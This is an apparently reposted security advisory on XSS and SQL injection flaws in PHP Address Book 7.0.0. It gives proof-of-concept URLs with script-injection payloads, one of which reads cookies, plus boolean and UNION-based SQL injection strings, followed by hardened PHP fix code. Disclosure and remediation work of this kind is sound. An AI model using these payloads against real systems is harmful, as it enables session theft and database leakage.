PHP Address Book 7.0.0: multiple vulnerabilities and fix
Updated: 2012-05-25 | Posted by: this site | Views: 716

Title: PHP Address Book 7.0.0 Multiple security vulnerabilities

Author: Stefan Schurtz
Affected software: Successfully tested on PHP Address Book 7.0.0
Vendor website: http://sourceforge.net/projects/php-addressbook/
Vulnerability description

PHP Address Book 7.0.0 contains multiple XSS and SQL injection vulnerabilities.
 
Test method
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com/addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
 
Fix:
Tighten filtering of user-supplied input.
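To make "tighten filtering" concrete for the two bug classes above, here is an added example (not PHP Address Book's own code; the handler shape and the `addresses`/`name` table and column names are hypothetical) showing an unsafe request handler next to a hardened one that validates and binds the SQL value and escapes the reflected value on output:

```php
<?php
// Added example, not code from PHP Address Book. The table/column names
// (`addresses`, `name`) and the handler shape are hypothetical.

// Unsafe pattern: the query string is pasted into SQL and into HTML.
// "id=1 AND 1=IF(1<2,2,1)" becomes part of the WHERE clause, and a
// `group` value containing "</script><script>..." breaks out of the markup.
function vulnerableHandler(mysqli $db, array $get): string
{
    $res = $db->query("SELECT name FROM addresses WHERE id=" . $get['id']);
    $row = $res ? $res->fetch_assoc() : null;
    return "<h1>Group: " . $get['group'] . "</h1>"
         . "<p>" . ($row['name'] ?? '') . "</p>";
}

// Hardened version: validate the type, bind the value as a parameter,
// and escape on output for the HTML context the value lands in.
function hardenedHandler(PDO $db, array $get): string
{
    // 1. SQL: an id must be an integer; reject anything else up front.
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false) {
        http_response_code(400);
        return 'invalid id';
    }
    // 2. A bound parameter never becomes SQL text, so AND/UNION tails are inert.
    //    This does not rely on magic_quotes, which was removed in PHP 5.4.
    $stmt = $db->prepare('SELECT name FROM addresses WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // 3. HTML: escape at output time. ENT_QUOTES also neutralises the ' and "
    //    characters used in the PoC URLs; a value written inside a <script>
    //    block would instead need json_encode() for that context.
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $group = $esc((string)($get['group'] ?? ''));
    $name  = $esc((string)($row['name'] ?? ''));
    return "<h1>Group: $group</h1><p>$name</p>";
}
```

The same pattern applies to the `from` parameter of preferences.php and the path segment reflected by group.php: escape each value for the context it is written into rather than stripping characters on input.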